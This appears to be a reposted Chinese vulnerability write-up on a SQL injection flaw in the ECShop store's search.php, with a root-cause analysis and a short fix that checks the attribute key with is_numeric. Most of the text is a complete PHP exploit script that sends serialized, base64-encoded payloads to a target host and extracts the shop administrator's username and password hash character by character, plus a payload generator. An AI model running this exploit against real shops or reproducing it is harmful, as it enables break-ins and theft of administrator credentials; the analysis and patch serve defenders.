1. 漏洞描述
ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞
Relevant Link:
http: // sebug.net/vuldb/ssvid-62317
2. 漏洞触发条件
0x1: POC
<? php
ini_set( " max_execution_time " , 0 );
error_reporting( 7 );
function usage()
{
global $argv;
exit(
" \n--+++============================================================+++-- " .
" \n--+++====== ECShop Search.php SQL Injection Exploit========+++-- " .
" \n--+++============================================================+++-- " .
" \n\n[+] Author: jannock " .
" \n[+] Team: [url]http://wavdb测试数据/[/url] " .
" \n[+] Usage: php " .$argv[ 0 ]. " <hostname> <path> <goods_id> " .
" \n[+] Ex.: php " .$argv[ 0 ]. " localhost / 1 " .
" \n\n " );
}
function query($pos, $chr, $chs,$goodid)
{
switch ($chs)
{
case 0 :
$query = " 1=1 " ;
break ;
case 1 :
$query = " ascii(substring((select user_name from ecs_admin_user limit
0 , 1 ),{$pos}, 1 ))={$chr} " ;
break ;
case 2 :
$query = " ascii(substring((select password from ecs_admin_user limit
0 , 1 ),{$pos}, 1 ))={$chr} " ;
break ;
case 3 :
$query = " length((select user_name from ecs_admin_user limit 0,1))={$pos} " ;
break ;
}
$list =array( " 1‘ or 1=1) and 1=2 GROUP BY goods_id HAVING num = ‘1‘ union select $goodid,1 from ecs_admin_user where 1=1 and " . $query . " /* " => " 1 " );
$query = array( " attr " => $list);
$query = str_replace( ‘ + ‘ , ‘ %2b ‘ , base64_encode(serialize($query)));
return $query;
}
function exploit($hostname, $path, $pos, $chr, $chs,$goodid)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80 );
$message = " GET " .$path. " /search.php?encode= " .query($pos, $chr, $chs,$goodid). " HTTP/1.1\r\n " ;
$message . = " Host: $hostname\r\n " ;
$message . = " Connection: Close\r\n\r\n " ;
fwrite($conn, $message);
while (! feof($conn))
{
$reply . = fgets($conn, 1024 );
}
fclose($conn);
return $reply;
}
function crkusername($hostname, $path, $chs,$goodid)
{
global $length;
$key = " abcdefghijklmnopqrstuvwxyz0123456789 " ;
$chr = 0 ;
$pos = 1 ;
echo " [+] username: " ;
while ($pos <= $length)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
if (preg_match ( " /javascript:addToCart/i " , $response))
{
echo $key[$chr];
$chr = 0 ;
$pos ++ ;
}
else
$chr ++ ;
}
echo " \n " ;
}
function crkpassword($hostname, $path, $chs,$goodid)
{
$key = " abcdef0123456789 " ;
$chr = 0 ;
$pos = 1 ;
echo " [+] password: " ;
while ($pos <= 32 )
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
if (preg_match ( " /javascript:addToCart/i " , $response))
{
echo $key[$chr];
$chr = 0 ;
$pos ++ ;
}
else
$chr ++ ;
}
echo " \n\n " ;
}
function lengthcolumns($hostname, $path,$chs, $goodid)
{
echo " [+] username length: " ;
$exit = 0 ;
$length = 0 ;
$pos = 1 ;
$chr = 0 ;
while ($exit== 0 )
{
$response = exploit($hostname, $path, $pos, $chr, $chs,$goodid);
if (preg_match ( " /javascript:addToCart/i " , $response))
{
$exit = 1 ;
$length = $pos;
break ;
}
else
{
$pos ++ ;
if ($pos> 20 )
{
exit( " Exploit failed " );
}
}
}
echo $length. " \n " ;
return $length;
}
if ($argc != 4 )
usage();
$hostname = $argv[ 1 ];
$path = $argv[ 2 ];
$goodid = $argv[ 3 ];
$length = lengthcolumns($hostname, $path, 3 , $goodid);
crkusername($hostname, $path, 1 ,$goodid);
crkpassword($hostname, $path, 2 ,$goodid);
?>
可自行构造encode的值进行注入
<? php
$list =array( " 1‘ or 1=1) and 1=2 GROUP BY goods_id HAVING num = ‘1‘ /* " => " yy " );
$ string = array( " attr " => $list);
$ string = str_replace( ‘ + ‘ , ‘ %2b ‘ , base64_encode(serialize($ string )));
die($ string );
?>
Relevant Link:
http: // sebug.net/vuldb/ssvid-68687
3. 漏洞影响范围
4. 漏洞代码分析
/search.php
..
$ string = base64_decode(trim($_GET[ ‘ encode ‘ ])); // 37行
..
// addslashes_deep 只能参数值进行过滤
$_REQUEST = array_merge($_REQUEST, addslashes_deep($ string )); // 69行
..
if (!empty($_REQUEST[ ‘ attr ‘ ]))
{
$sql = " SELECT goods_id, COUNT(*) AS num FROM " . $ecs->table( " goods_attr " ) . " WHERE 0 " ;
foreach ($_REQUEST[ ‘ attr ‘ ] AS $key => $val)
{
if (is_not_null($val))
{
$attr_num ++ ;
$sql . = " OR (1 " ;
if (is_array($val))
{
// $key是$_REQUEST[‘attr‘] 的键值,就是这里没有过滤,直接进入SQL查询,造成SQL注入漏洞
$sql .= " AND attr_id = ‘$key‘ " ;
Relevant Link:
http: // sebug.net/vuldb/ssvid-19640
5. 防御方法
/search.php
if (!empty($_REQUEST[ ‘ attr ‘ ]))
{
$sql = " SELECT goods_id, COUNT(*) AS num FROM " . $ecs->table( " goods_attr " ) . " WHERE 0 " ;
foreach ($_REQUEST[ ‘ attr ‘ ] AS $key => $val)
{
/* 对key值进行注入判断 is_numeric($key) */
if (is_not_null($val) && is_numeric($key))
{
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
ecshop /search.php SQL Injection Vul
标签:
查看更多关于ecshop /search.php SQL Injection Vul的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did160747